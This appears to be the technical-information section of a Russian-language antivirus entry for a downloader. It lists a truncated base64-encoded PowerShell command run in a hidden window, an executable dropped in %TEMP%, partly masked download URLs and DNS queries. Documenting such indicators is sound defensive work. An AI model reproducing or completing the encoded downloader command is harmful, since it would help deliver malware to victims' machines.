Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAHUAagA2AG8AawA3AD0AJwBLAGYAMQBkAGwANwB6ACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABlAGMAdQByAEkAdABZAHAAYABSAG8AVABgAE8AQwBPAEwAIgAgAD0AIAAnAH...
- %TEMP%\jhrx.exe
- %TEMP%\jhrx.exe
- http://qu####monkey.com/6u1alr/jmu_etfp_04jtkjifle/
- http://xs##ly.com/a/ofq_4p_uxpjw862i/
- http://jk#####solutions.com/parkift/c_d_oxim1b19/
- http://ni##.###pple-staging.co.uk/wp-content/uploads/s_s8p5_vs3fb/
- DNS ASK qu####monkey.com
- DNS ASK qu#####onnection.com
- DNS ASK xs##ly.com
- DNS ASK jk#####solutions.com
- DNS ASK ni##.###pple-staging.co.uk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAHUAagA2AG8AawA3AD0AJwBLAGYAMQBkAGwANwB6ACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABlAGMAdQByAEkAdABZAHAAYABSAG8AVABgAE8AQwBPAEwAIgAgAD0AIAAnAH...' (со скрытым окном)